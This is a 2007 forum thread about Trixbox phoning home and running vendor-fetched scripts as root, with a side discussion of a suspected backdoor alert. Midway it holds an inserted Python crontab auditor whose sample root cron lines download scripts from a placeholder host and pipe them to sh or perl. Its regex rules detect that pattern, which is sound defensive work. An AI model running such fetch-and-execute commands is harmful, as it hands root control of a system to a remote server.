tommy13v (Premium, join:2002-02-15, Niskayuna NY)
[General] Trixbox phoning home controversy. Story:
An anonymous reader writes to let us know that users of Trixbox, a PBX based on Asterisk, recently discovered that the software has been phoning home with statistics about their installations. It's easy enough to disable, and not particularly stealthy (beyond encrypting the data sent back), but customers in the forum are annoyed at not having been informed of the reporting. Trixbox is owned by Fonality, which makes customized PBXs (again based on Asterisk) for paying customers.
»yro.slashdot.org/yro/07/12/16/222243.shtml
-- Click to Call for Asterisk servers byodvox coming soon

Test99 (Premium, join:2003-04-24, San Jose, CA, kudos:1)
How do you feel about it, Tommy?
-- 50775@fwd.pulver.com

tommy13v (Premium, join:2002-02-15, Niskayuna NY)
To be honest, I could care less about the fact that they want to get some stats of the install base. What I do care about is that they are executing commands as root on the box, and if their servers are compromised, or someone working for them decides he is upset, then they could in theory execute a command as root to cause a problem.
I see it as a security risk.

reply to tommy13v
Looks like from the perl script that this same approach is used by Trixbox Pro and Fonality to grab data from those systems too.
One hacker breaks into update.fonality.com and they can be running scripts on Fonality-based PBXs across the world. As root. And I bet that the Fonality PBXs are almost all inside the firewall, so who knows how much damage this thing could do inside a company?
And the Fonality people fess up to Trixbox CE having the issue, but leave out that Fonality and Trixbox Pro systems are just as vulnerable. That really is pretty crappy behavior.

cbrain (join:2000-05-21, Silver Spring, MD)
reply to tommy13v
Nerd Vittles takes notice: Monday, December 17, 2007, "Just Say No: Hidden BOTs and Asterisk Don't Mix"
... Our objection is more fundamental and goes to the existence of the tool itself and the failure to disclose it. Unfortunately, a remotely configurable BOT with root access privileges is a bit like giving someone a blank check with your signature affixed. And it's worse in this case because users had no notice that they were handing over the keys to their castle by installing and using trixbox. One can't help wondering if Fonality management really grasps how dangerous such a system design is in this day and age. This isn't about the commands that Fonality was executing. It's about the commands that could be executed if this system were ever compromised. We have daily logs full of attempts to hack our systems using, you guessed it, remotely controlled BOTS. ...
»nerdvittles.com/index.php?p=198

Test99 (Premium, join:2003-04-24, San Jose, CA, kudos:1)
Not Just Trixbox
I recently installed a Windows port of Asterisk from this site: »www.asteriskwin32.com/ to evaluate it.
The next Zone Alarm scan discovered this nasty critter:
Win32.Backdoor.IRCBot.td in c:\Program Files\cygroot\bin\cygwin.dll
This is the registry entry:
File: C:\Program Files\cygroot\bin\cygwin1.dll
Module: C:\Program Files\cygroot\bin\cygwin1.dll
RegistryKey: HKEY_CURRENT_USER\Software\Cygnus Solutions
RegistryKey: HKEY_LOCAL_MACHINE\SOFTWARE\Cygnus Solutions
I'm still investigating to see what I have to do to clean the system.
-- 50775@fwd.pulver.com

cbrain (join:2000-05-21, Silver Spring, MD)
Re: [General] Trixbox phoning home controversy.
said by feelyou22: do you feel about it,
I feel hurt ... betrayed ... vulnerable. I never thought free software I was so strongly attracted to would do something like this to me.

reply to tommy13v
said by tommy13v: To be honest I could care less about the fact that they want to get some stats of the install base
The implementation was really bad. It would actually download a script from Fonality servers and execute it (possibly as root). That script could do ANYTHING, from sniffing your network to installing backdoors/trojans, ____ (fill in your worst case nightmare).

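A defender-side check for the pattern this post describes (a scheduled job that fetches a script from a remote server and runs it as root), added here as an example that is not code from the thread or from Trixbox/Fonality: it audits crontab lines for fetch-and-execute jobs and singles out the ones running as root. The sample crontab, its placeholder hostname and the detection regexes are all constructed assumptions for this example.

```python
import re

# Heuristic rules for "fetch remote content, then execute it" in scheduled
# jobs. The regexes are this example's own assumptions, not a complete list.
RULES = [
    ("pipe-to-interpreter", re.compile(
        r"\b(?:curl|wget|fetch|lwp-download|GET)\b.*\|\s*(?:sudo\s+)?(?:sh|bash|perl|php|python\d?)\b")),
    ("fetch-then-run", re.compile(
        r"\b(?:curl|wget|fetch)\b.*(?:&&|;)\s*(?:sudo\s+)?(?:sh|bash|perl|php|python\d?)\s+\S+")),
    ("eval-of-remote-content", re.compile(r"\beval\b.*(?:\bget\s*\(|https?://)")),
]

# Constructed sample in /etc/cron.d format (five time fields, user, command).
# The hostname is a placeholder, not a real update server.
SAMPLE = """\
# harmless: reports stats but never executes anything the server returns
0 3 * * * asterisk /usr/local/bin/report-stats.pl
# risky: streams a remote script straight into a shell, as root
0 4 * * * root wget -q -O - http://update.example.invalid/cmd.sh | sh
# risky: saves a remote script and runs it, as root
30 4 * * * root curl -s http://update.example.invalid/job.pl -o /tmp/job.pl && perl /tmp/job.pl
# risky: evals whatever the server sends, as root
15 5 * * * root perl -MLWP::Simple -e 'eval get("http://update.example.invalid/x")'
"""


def audit_crontab(text, system_format=True):
    """One finding per job line matching a rule. system_format=True means
    /etc/crontab or cron.d lines, which carry a user field; user crontabs don't."""
    findings = []
    n = 6 if system_format else 5           # index of the command field
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue                        # blank line or comment
        fields = stripped.split(None, n)
        if len(fields) <= n:
            continue                        # no command field to audit
        user = fields[5] if system_format else None
        for name, rx in RULES:
            if rx.search(fields[n]):
                findings.append({"line": lineno, "rule": name, "user": user, "cmd": fields[n]})
                break
    return findings


def root_findings(text, system_format=True):
    """The blank-check case from the thread: remote code executed as root."""
    return [f for f in audit_crontab(text, system_format) if f["user"] == "root"]
```

Running `root_findings(SAMPLE)` reports the three root jobs and leaves the stats reporter alone; the same pass over a real /etc/cron.d directory, and over any script those jobs invoke, is the check an administrator would want before trusting a vendor's "update" job.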
tommy13v (Premium, join:2002-02-15, Niskayuna NY)
reply to Test99
Re: Not Just Trixbox
That DLL acts as a Linux API emulation layer providing the Linux functionality.

kaila (join:2000-10-11, Lincolnshire, IL)
reply to tommy13v
Re: [General] Trixbox phoning home controversy.
Fonality has been attempting (if quietly) to monetize trixbox and their user base for a while now, and I think this was an obviously not well thought out attempt to collect what users are doing with CE toward that end. While not quite as bad as Sony's rootkit fiasco, it is a pretty serious issue and potentially reputation destroying. Kerry, Chris, and Andrew are certainly getting hammered for it.
Right now they seem to be doing the best they can at the moment (capitulating, and promising to remove the vulnerability), but time will tell if these and future actions will have a positive effect. This is certainly a teaching moment if there ever was one. Trixbox may ultimately benefit if it forces Fonality to rethink what's best for trixbox within their organization.
For now, I'm using PBXiaf.

tommy13v (Premium, join:2002-02-15, Niskayuna NY)
How is PBXiaf going for you?

Test99 (Premium, join:2003-04-24, San Jose, CA, kudos:1)
reply to tommy13v
Re: Not Just Trixbox
said by tommy13v: That DLL acts as a Linux API emulation layer providing the linux functionality.
Understood. What's not yet clear is where it acquired the ability to take orders from Internet Relay Chat.
-- 50775@fwd.pulver.com

kaila (join:2000-10-11, Lincolnshire, IL)
reply to tommy13v
Re: [General] Trixbox phoning home controversy.
said by tommy13v: how is PBXiaf going for you?
Amazingly well, actually. The install is simple and produces a very stable system. Config Edit is rolled into freePBX and endpoint management is there (one feature trixbox did well and I don't think I can live without). There are the 'kitchen sink' aspects of trixbox that PBXiaf can't match. But perhaps due to the overall simplicity of the install, they have been able to steadily crank out script-based features. Overall I'm happy and would recommend it to almost anyone.
Ward's the one who got me into asterisk, and he always seems to have the right combination of technical knowledge, careful motivation, and communication skills to put people on the path to successful asterisk-based systems.

celtic
said by kaila: ... Config Edit is rolled into freePBX and endpoint management is there (one feature trixbox did well and I don't think I can live without). There are the 'kitchen sink' aspects of trixbox that PBXiaf can't match. But perhaps due to the overall simplicity of the install, they have been able to steadily crank out script based features. Overall I'm happy and would recommend it to almost anyone. ...
What features are in Trixbox that are not included in PBXiaf?

kaila (join:2000-10-11, Lincolnshire, IL)
said by celtic: What features are in Trixbox that are not included in PBXiaf?
Both use freePBX for configuring the server, so trixbox really adds nothing over PBXiaf from the standpoint of taking/making/routing calls.
Trixbox does offer HUDlite, trixnet (a kind of trixbox enum service), and literally hundreds of extra packages that a very small minority would find useful. On the other side, PBXiaf offers a small but growing number of their own add-ons as well, that in general have a broader appeal.

rugby ("I think I know it all.", VIP, join:2000-09-26, Indianapolis, IN)
reply to celtic
A decent endpoint manager for most IP phones.

kaila (join:2000-10-11, Lincolnshire, IL)
said by rugby: A decent endpoint manager for most IP phones.
Agreed. While PBXiaf does offer endpoint management, it is not GUI-based like trixbox, and requires hand editing config files. GUI-based endpoint management is on the freePBX roadmap for version 3, but that release is a long way off....

B (Premium, MVM, join:2000-10-28)
reply to Test99
Re: Not Just Trixbox
I'm betting (guessing) that it didn't, and that this is a false positive... Good luck. You could try running it by one of the multi-engine scanners (Jotti).
-- B -- In a realm outside causality and function

Test99 (Premium, join:2003-04-24, San Jose, CA, kudos:1)
said by B: I'm betting (guessing) that it didn't, and that this is a false positive...
Good suggestion. You may be right. Scans thus far have not detected any other signs of intrusion. Writing malware detection programs must be a difficult assignment.
-- 50775@fwd.pulver.com